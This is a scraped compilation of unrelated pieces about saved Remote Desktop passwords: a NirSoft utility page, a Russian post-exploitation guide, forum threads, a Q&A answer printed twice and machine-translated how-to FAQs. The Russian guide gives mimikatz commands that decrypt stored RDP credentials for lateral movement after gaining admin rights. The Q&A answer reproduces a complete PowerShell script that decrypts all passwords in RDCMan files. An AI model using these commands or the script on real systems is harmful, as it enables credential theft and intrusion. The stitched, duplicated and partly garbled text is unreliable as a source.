Remote Desktop PassView v1.02 — Recover the password of Remote Desktop Connection utility Copyright (c) 2006 — 2014 Nir Sofer |
Description
Remote Desktop PassView is a small utility that reveals the password stored by
Microsoft Remote Desktop Connection utility inside the .rdp files.
Notice: Currently, this tool doesn’t work with the latest versions of Remote Desktop Connection utility.
You can use the following tools to get the passwords stored by new versions of Remote Desktop Connection (6.0 or higher):
Network Password Recovery
CredentialsFileView
Versions History
- Version 1.02 — Removed the command-line options that export the passwords to a file from the official version. A version of this tool with full command-line support will be posted on separated Web page.
- Version 1.01 — The configuration is now saved to a file instead of the Registry.
- Version 1.00 — First release.
License
This utility is released as freeware.
You are allowed to freely distribute this utility via floppy disk, CD-ROM,
Internet, or in any other way, as long as you don’t charge anything for this.
If you distribute this utility, you must include all files in
the distribution package, without any modification !
Be aware that selling this utility as a part of a software package is not allowed !
Disclaimer
The software is provided «AS IS» without any warranty, either expressed or implied,
including, but not limited to, the implied warranties of merchantability and fitness
for a particular purpose. The author will not be liable for any special, incidental,
consequential or indirect damages due to loss of data or any other reason.
Using Remote Desktop PassView
Remote Desktop PassView doesn’t require any installation process or additional DLL files.
Just copy the executable (rdpv.exe) to any folder you like, and run it.
After you run rdpv.exe, the main window display the passwords of .rdp located under your
«My Documents» folder. The default .rdp file (Default.rdp) is usually stored in this location
If you want to recover that password of another .rdp file, just drag the file from Explorer into
the window of Remote Desktop PassView utility or use the «Open .rdp File» option from the File menu.
Be aware that Remote Desktop PassView can only recover the passwords created by your current
logged on user. It cannot recover the passwords of .rdp files created by other users.
Translating Remote Desktop PassView To Another Language
Remote Desktop PassView allows you to easily translate all menus, dialog-boxes, and other strings
to other languages.
In order to do that, follow the instructions below:
- Run Remote Desktop PassView with /savelangfile parameter:
rdpv.exe /savelangfile
A file named rdpv_lng.ini will be created in the folder of Remote Desktop PassView utility. - Open the created language file in Notepad or in any other text editor.
- Translate all menus, dialog-boxes, and string entries to the desired language.
- After you finish the translation, Run Remote Desktop PassView, and all translated
strings will be loaded from the language file.
If you want to run Remote Desktop PassView without the translation, simply rename the language file, or move
it to another folder.
Feedback
If you have any problem, suggestion, comment, or you found a bug in my utility,
you can send a message to nirsofer@yahoo.com
Remote Desktop PassView is also available in other languages. In order to change the language of
Remote Desktop PassView, download the appropriate language zip file, extract the ‘rdpv_lng.ini’,
and put it in the same folder that you Installed Remote Desktop PassView utility.
Language | Translated By | Date | Version |
---|---|---|---|
Arabic | Abo Rehaam | 11/02/2011 | 1.01
|
Bulgarian | Hristo Drumev | 13/01/2007 | |
Dutch | Jan Verheijen | 23/02/2015 | 1.02 |
French | PasswordOne | 21/02/2015 | |
Galician | Xosé Antón Vicente rodríguez | 13/01/2007 | |
German | «Latino» auf WinTotal.de | 18/09/2014 | 1.02 |
Hebrew | peterg | 29/04/2011 | |
Hungarian | ZityiSoft | 20/06/2009 |
|
Italian | Fabio Mastroianni | 13/01/2007 | |
Italian | Maurizio Madaro | 12/01/2007 | |
Persian | ( JAVAD JOURSARAEI Alashti ) | 06/08/2014 | |
Persian | Amirreza Nasiri | 13/11/2015 | 1.02 |
Romanian | Jaff (Oprea Nicolae) | 05/02/2016 | 1.02 |
Russian | Sonya | 10/03/2010 | |
Simplified Chinese | Rindz | 30/11/2013 | 1.04
|
Slovak | František Fico | 09/02/2017 | 1.02 |
Spanish | Spyn — Toño | 21/04/2009 | |
Spanish | arquer.net | 20/05/2009 | |
Taiwanese | Republic of Taiwan | 06/01/2007 | |
Traditional Chinese | 繁體中文 | 23/03/2007 | |
Turkish | Kitap Özetleri | 30/01/2009 | |
Turkish | EFromm | 11/02/2009 |
|
0x01 введение
После получения полномочий администратора компьютера интрасети проверьте, существует ли локально сохраненный пароль для подключения RDP, и расшифруйте сохраненный пароль для подключения RDP локально.После успешного дешифрования вы можете использовать эти учетные данные для продолжения горизонтального перемещения.
0x02 Получить пароль RDP, сохраненный локально на управляемой машине
Один, мимикатц
1. Проверьте целевой компьютер, к которому локальный компьютер подключен локально.
reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s
2. Проверьте, есть ли в этом каталоге файл паролей RDP для локального пользователя.
dir /a %userprofile%AppDataLocalMicrosoftCredentials*
Просмотр информации об удаленном хосте, сохраненной локально
cmdkey /list
3. Выберите файл паролей, чтобы расшифровать его. Здесь вам нужно записать значение guidMasterKey, и вы найдете соответствующий мастер-ключ позже через guidMasterKey.
mimikatz # privilege::debug
mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58
4. Найдите соответствующий мастер-ключ в соответствии с guidMasterKey.
mimikatz # sekurlsa::dpapi
5. Расшифруйте простой текстовый пароль RDP-подключения с помощью Masterkey.
mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58 /masterkey:1df6b7a86b7aa3238c6899b1b4fd7b4ccba852db9b2ea611bbb7943f34b788f55d27835591ccde1e6c643d9aca724fd495282f5fc92ee80746262d8759b9d23d
Два, netpass
скачать:
netpass
использовать:
Дважды щелкните netpass.exe.
:
Три, другие
Скрипт Powershell для автоматизации дешифрования …
- Remove From My Forums
-
Вопрос
-
Ситуация:
имеется общедоступное хранилище rdp файлов с опубликованными различными прилождениями на windows server 2008r2 enterprise (russian), клиентам через gp распространяются линки на эти файлы, некоторые пользователи при первом подключении сохраняют логин/пароль но вводят их неверное.
Внимание ворос — что где нужно удалить чтобы сбросить сохраненные данные? Вариант через запуск mstsc.exe с очисткой данных не подходит.
Искал ветки в реестре HKCU и файлы в профиле, но ни к чему работающему не пришел.P.S. Интересно именно удаленная очистка сохранение — те ветка реестра и/или файлы задействованные в сохранении rpd пароля/логина, дабы не подключаться к gui каждого.
-
Изменено
28 сентября 2009 г. 14:46
Добавлен p.s.
-
Изменено
Ответы
-
Пуск -> Настройка -> Панель управления -> Учётные записи пользователей -> Закладка «Дополнительно» -> Кнопка «Управление паролями»
MCSE, MCTS, MCITP, STS, VTSP
Добавлю свои 5 копеек: можно автоматизировать удаление сохраненных Сетевых паролей (Stored User Names andPasswords) при помощи простого логон скрипта и утилиты коммандной строки cmdkey
-
Предложено в качестве ответа
Buchenkov Andrey
29 сентября 2009 г. 5:55 -
Помечено в качестве ответа
gamumba
29 сентября 2009 г. 6:55
-
Предложено в качестве ответа
07.10.12 — 13:21
Привет всем!
Где хранит пароли RDP-клиент? (win7)
Реально ли выдернуть учетку?
1 — 07.10.12 — 13:51
Панель управления — учетные записи пользователей — диспетчер учетных данных
2 — 07.10.12 — 16:35
(1) да при чем тут учетки юзеров?
Где физически хранятся пароли (хеши) от RDP-клиента?
3 — 07.10.12 — 16:36
учись пользоваться яндексом и гуглом
4 — 07.10.12 — 16:36
(2) в моих документах файлики лежат рдпшные
скрытые вроде как
5 — 07.10.12 — 16:38
IP давай
6 — 07.10.12 — 16:41
(3) не помогло
(4) эх…
Итак, на рабочем столе есть ярлык RDP. В нем сохранена учетная запись для подключения (user&pass)
Мне пароль нада посмотреть
7 — 07.10.12 — 23:32
ярлык указывает на %windir%system32mstsc.exe
пароля там нет
8 — 07.10.12 — 23:33
9 — 07.10.12 — 23:33
всё в реестре, в жутко зашифрованном виде
10 — 07.10.12 — 23:33
11 — 07.10.12 — 23:34
(8) оригинально
12 — 07.10.12 — 23:38
(9) Не уверен, что даже сама винда сможет расшифровать пароль. Скорее всего, хранятся только кеши.
13 — 07.10.12 — 23:42
винда точно не сможет
14 — 07.10.12 — 23:45
(10) а по ссылке сходить. все там можно
Чтобы использовать cmdkey , чтобы добавить имя пользователя и пароль для пользователя Mikedan доступ к компьютеру Server01 с паролем Kleo, типа:
cmdkey / дополнения: сервер / пользователь: mikedan / пароль: Kleo
Чтобы использовать cmdkey , чтобы добавить имя пользователя и пароль для пользователя Mikedan доступ к компьютеру Server01 и приглашение для ввода пароля всякий раз, когда Server01 доступ, типа:
cmdkey / дополнения: сервер / пользователь: mikedan
15 — 07.10.12 — 23:47
и?
16 — 07.10.12 — 23:53
что и .
читать надо
Списка: TargetName
Отображает список имен пользователей и учетных данных. Если TargetName не указано, все сохраненные имена пользователей и учетные данные будут перечислены.
17 — 07.10.12 — 23:57
речь вообще-то о паролях
18 — 07.10.12 — 23:58
так что «и?»
19 — 08.10.12 — 00:00
20 — 08.10.12 — 00:01
ну так там внимательно по ссылке.
описано что
Creates, lists and deletes stored user names and passwords or credentials.
passwords это слово видим ?
21 — 08.10.12 — 00:04
(0) Вообще на сколько я читал пароли кодируются с привязкой то ли к учетной записи, то ли к машине. Тоесть вроде как расшифровать можно но только на том же компьютере/пользователе.
Погугли на тему RDP + CryptProtectData и CryptUnrotectData
22 — 08.10.12 — 00:08
23 — 08.10.12 — 00:26
(0) забыл пароль, смени на новый.
ИМХО, такой вопрос (попытка на него ответить) не только правила форума нарушает, но и попадает под действие УК РФ
oslokot
24 — 08.10.12 — 09:30
(23) да, вы правы. Пароль забыл, пароль сменю.
Тему можно закрывать
Is there a way to decrypt a password stored in an .rdg (Remote Desktop Connection Manager) file, providing you know the username and password of the user who created it?
I know that the password is encrypted based on the user who created it. The user is a domain user, and I am trying to use the .rdg file at home (domain unavailable). Can I «simulate» being the domain user, since I know the username+password? Remember, network access to the domain is unavailable. Physical access to the original machine is also unavailable.
I have tried this method, but (unsurprisingly) I get
«Exception calling DecryptString with 2 argument(s): Failed to decrypt using XXXX credential»
(XXX is my current home login.)
jpaugh
1,3789 silver badges20 bronze badges
asked Jul 20, 2016 at 14:33
Here’s a Powershell script that will do the job…
Open the RDG file with notepad to get the encrypted password. I found
that RDG contained the ‘profiles’ I had saved, as well as the
passwords saved per server.Now use the same computer and windows account that created the RDG
file to run the following powershell commands to see the password. You
have to use the same account to decrypt.> $PwdString = 'EnCryptEdStringFRoMRDGfile==' > Copy-Item 'C:Program Files (x86)MicrosoftRemote Desktop Connection ManagerRDCMan.exe' 'C:tempRDCMan.dll' > Import-Module 'C:tempRDCMan.dll' > $EncryptionSettings = New-Object -TypeName RdcMan.EncryptionSettings > [RdcMan.Encryption]::DecryptString($PwdString, $EncryptionSettings)
Source:
https://blog.prudhomme.wtf/use-powershell-to-decrypt-password-stored-in-a-rdg-file/ by THOMAS PRUD’HOMME
answered Jan 4, 2017 at 14:59
KenKen
2112 silver badges3 bronze badges
3
Use the following Powershell script to decrypt all passwords in an RDG file in a single shot.
https://github.com/nettitude/PoshC2/blob/master/resources/modules/Decrypt-RDCMan.ps1
In case the link fails here’s the content for reference:
function Decrypt-RDCMan ($FilePath) {
<#
.SYNOPSIS
This script should be able to decrpt all passwords stored in the RDCMan config file
Function: Decrypt-RDCMan
Author:Ben Turner @benpturner, Rich Hicks @scriptmonkey_
.EXAMPLE
Decrypt-RDCMan -FilePath
#>
if (!$FilePath) {
[xml]$config = Get-Content "$env:LOCALAPPDATAmicrosoftremote desktop connection managerrdcman.settings"
$Xml = Select-Xml -Xml $config -XPath "//FilesToOpen/*"
$Xml | select-object -ExpandProperty "Node"| % {Write-Output "Decrypting file: " $_.InnerText; Decrypt-RDCMan $_.InnerText}
} else {
[xml]$Types = Get-Content $FilePath
$Xml = Select-Xml -Xml $Types -XPath "//logonCredentials"
# depending on the RDCMan version we may need to change the XML search
$Xml | select-object -ExpandProperty "Node" | % { $pass = Decrypt-DPAPI $_.Password; $_.Domain + "" + $_.Username + " - " + $Pass + " - " + "Hash:" + $_.Password + "`n" }
# depending on the RDCMan version, we may have to use search through the #text field in the XML structure
$Xml | select-object -ExpandProperty "Node" | % { $pass = Decrypt-DPAPI $_.Password."#text"; $_.Domain + "" + $_.Username + "`n" + $Pass + " - Hash: " + $_.Password."#text" + "`n"}
}
}
function Decrypt-DPAPI ($EncryptedString) {
# load the Security Assembly into the PS runspace
Add-Type -assembly System.Security
$encoding= [System.Text.Encoding]::ASCII
$uencoding = [System.Text.Encoding]::UNICODE
# try and decrypt the password with the CurrentUser Scope
try {
$encryptedBytes = [System.Convert]::FromBase64String($encryptedstring)
$bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
[System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % { $myStr1 += [char]$_}
echo $myStr1
}
catch {
# try and decrypt the password with the LocalMachine Scope only if the CurrentUser fails
try {
$encryptedBytes = [System.Convert]::FromBase64String($encryptedstring)
$bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)
[System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % { $myStr1 += [char]$_}
echo $myStr1
}
catch {
echo "Could not decrypt password"
}
}
}
Execute the script in Powershell ISE, that should register the functions. Then simple run:
Decrypt-RDCMan -FilePath MyRDGfile.rdg
answered Oct 20, 2018 at 8:03
1
Is there a way to decrypt a password stored in an .rdg (Remote Desktop Connection Manager) file, providing you know the username and password of the user who created it?
I know that the password is encrypted based on the user who created it. The user is a domain user, and I am trying to use the .rdg file at home (domain unavailable). Can I «simulate» being the domain user, since I know the username+password? Remember, network access to the domain is unavailable. Physical access to the original machine is also unavailable.
I have tried this method, but (unsurprisingly) I get
«Exception calling DecryptString with 2 argument(s): Failed to decrypt using XXXX credential»
(XXX is my current home login.)
jpaugh
1,3789 silver badges20 bronze badges
asked Jul 20, 2016 at 14:33
Here’s a Powershell script that will do the job…
Open the RDG file with notepad to get the encrypted password. I found
that RDG contained the ‘profiles’ I had saved, as well as the
passwords saved per server.Now use the same computer and windows account that created the RDG
file to run the following powershell commands to see the password. You
have to use the same account to decrypt.> $PwdString = 'EnCryptEdStringFRoMRDGfile==' > Copy-Item 'C:Program Files (x86)MicrosoftRemote Desktop Connection ManagerRDCMan.exe' 'C:tempRDCMan.dll' > Import-Module 'C:tempRDCMan.dll' > $EncryptionSettings = New-Object -TypeName RdcMan.EncryptionSettings > [RdcMan.Encryption]::DecryptString($PwdString, $EncryptionSettings)
Source:
https://blog.prudhomme.wtf/use-powershell-to-decrypt-password-stored-in-a-rdg-file/ by THOMAS PRUD’HOMME
answered Jan 4, 2017 at 14:59
KenKen
2112 silver badges3 bronze badges
3
Use the following Powershell script to decrypt all passwords in an RDG file in a single shot.
https://github.com/nettitude/PoshC2/blob/master/resources/modules/Decrypt-RDCMan.ps1
In case the link fails here’s the content for reference:
function Decrypt-RDCMan ($FilePath) {
<#
.SYNOPSIS
This script should be able to decrpt all passwords stored in the RDCMan config file
Function: Decrypt-RDCMan
Author:Ben Turner @benpturner, Rich Hicks @scriptmonkey_
.EXAMPLE
Decrypt-RDCMan -FilePath
#>
if (!$FilePath) {
[xml]$config = Get-Content "$env:LOCALAPPDATAmicrosoftremote desktop connection managerrdcman.settings"
$Xml = Select-Xml -Xml $config -XPath "//FilesToOpen/*"
$Xml | select-object -ExpandProperty "Node"| % {Write-Output "Decrypting file: " $_.InnerText; Decrypt-RDCMan $_.InnerText}
} else {
[xml]$Types = Get-Content $FilePath
$Xml = Select-Xml -Xml $Types -XPath "//logonCredentials"
# depending on the RDCMan version we may need to change the XML search
$Xml | select-object -ExpandProperty "Node" | % { $pass = Decrypt-DPAPI $_.Password; $_.Domain + "" + $_.Username + " - " + $Pass + " - " + "Hash:" + $_.Password + "`n" }
# depending on the RDCMan version, we may have to use search through the #text field in the XML structure
$Xml | select-object -ExpandProperty "Node" | % { $pass = Decrypt-DPAPI $_.Password."#text"; $_.Domain + "" + $_.Username + "`n" + $Pass + " - Hash: " + $_.Password."#text" + "`n"}
}
}
function Decrypt-DPAPI ($EncryptedString) {
# load the Security Assembly into the PS runspace
Add-Type -assembly System.Security
$encoding= [System.Text.Encoding]::ASCII
$uencoding = [System.Text.Encoding]::UNICODE
# try and decrypt the password with the CurrentUser Scope
try {
$encryptedBytes = [System.Convert]::FromBase64String($encryptedstring)
$bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
[System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % { $myStr1 += [char]$_}
echo $myStr1
}
catch {
# try and decrypt the password with the LocalMachine Scope only if the CurrentUser fails
try {
$encryptedBytes = [System.Convert]::FromBase64String($encryptedstring)
$bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)
[System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % { $myStr1 += [char]$_}
echo $myStr1
}
catch {
echo "Could not decrypt password"
}
}
}
Execute the script in Powershell ISE, that should register the functions. Then simple run:
Decrypt-RDCMan -FilePath MyRDGfile.rdg
answered Oct 20, 2018 at 8:03
1
Нажмите клавишу Windows и введите: расширенная система. Щелкните Просмотр дополнительных настроек системы. Щелкните вкладку «Удаленный» и выберите «Разрешить удаленные подключения к этому компьютеру». Установите флажок «Проверка подлинности на уровне сети» для большей безопасности.
В служебной программе «Управление компьютером» перейдите в «Локальные пользователи и группы»> «Пользователи», затем щелкните правой кнопкой мыши нужного пользователя удаленного рабочего стола (пользователь по умолчанию — ServerAdmin) и выберите Установить пароль…. Во всплывающем окне выберите «Продолжить» и завершите смену пароля.
Как мне найти свои учетные данные для удаленного рабочего стола?
Щелкните значок настроек / шестеренки в правом верхнем углу окна Jump Desktop Connect. Затем нажмите Диагностика. Ваше имя пользователя будет отображаться рядом с полем «Имя пользователя». Используйте это как имя пользователя в запросе учетных данных Windows.
Как мне найти имя пользователя и пароль для удаленного рабочего стола?
Удаленный рабочий стол с компьютера Linux
Откройте свою терминальную программу. (Не забудьте использовать IP-адрес вашего сервера.) Появится запрос на вход в Windows. Войдите в систему, используя «Администратор» в качестве имени пользователя и основного пароля администратора..
Что такое учетный пароль в удаленном рабочем столе?
Обычно используется для хранения учетных данных Windows для ваших текущих сеансов потому что диспетчер удаленного рабочего стола не может получить к ним доступ. … Когда требуется сменить пароль, вам просто нужно изменить его один раз в «Мои личные учетные данные».
Как мне войти в удаленный рабочий стол без пароля?
Windows — разрешить доступ к удаленному рабочему столу с пустыми паролями
- Запустите gpedit.msc.
- Перейдите в Конфигурация компьютера> Параметры Windows> Параметры безопасности> Локальные политики> Параметры безопасности.
- Установить учетные записи: ограничение использования пустых паролей локальными учетными записями только для входа в консоль = отключено.
Как подключиться к удаленному рабочему столу в Windows 10?
На локальном ПК с Windows 10: в поле поиска на панели задач тип Подключение к удаленному рабочему столу, а затем выберите Подключение к удаленному рабочему столу. В «Подключение к удаленному рабочему столу» введите имя ПК, к которому вы хотите подключиться (из шага 1), а затем выберите «Подключиться».
Как настроить учетные данные удаленного рабочего стола?
Перейдите в «Пуск -> Все программы -> Стандартные -> Подключение к удаленному рабочему столу».». 2. Откроется окно, подобное приведенному ниже, где вы должны ввести адрес своего удаленного компьютера. Нажмите «Подключиться», чтобы ввести свои учетные данные.
Как использовать учетные данные удаленного рабочего стола?
Процедура
- Запустите клиент подключения к удаленному рабочему столу Microsoft, щелкнув Пуск> Все программы> Стандартные> Подключение к удаленному рабочему столу.
- Укажите имя целевого хоста или IP-адрес.
- Нажмите Connect.
- Когда будет предложено войти в систему с учетными данными общего доступа, выберите Да.
Как изменить учетные данные удаленного рабочего стола?
Как изменить пароль через удаленный рабочий стол
- Шаг 1: В меню «Пуск» окна найдите «подключение к удаленному рабочему столу» и откройте его.
- Шаг 2: Введите имя компьютера как «passreset1.uwb.edu» и нажмите «Подключиться».
- Шаг 3: Вам будет предложено ввести учетные данные, выберите «Использовать другую учетную запись».
Как мне войти в систему как администратор на удаленном рабочем столе?
Удаленный рабочий стол: добавление пользователя в группу администраторов (Windows 7)
- Откройте меню «Пуск» на рабочем столе и выберите «Панель управления».
- Выберите Учетные записи пользователей и выберите Учетные записи пользователей.
- Выберите Управление учетными записями пользователей.
- В окне «Учетные записи пользователей» выберите учетную запись, которую нужно изменить, и выберите «Свойства».
Как мне войти на удаленный рабочий стол как администратор?
Сетевое администрирование: подключение к удаленному рабочему столу
- Откройте Панель управления и дважды щелкните Система. На этом шаге появляется системный апплет.
- Щелкните вкладку Remote. Этот шаг вызывает параметры удаленного доступа.
- Установите один из двух флажков Разрешить подключения. Какой выбрать? …
- Щелкните ОК. Готово!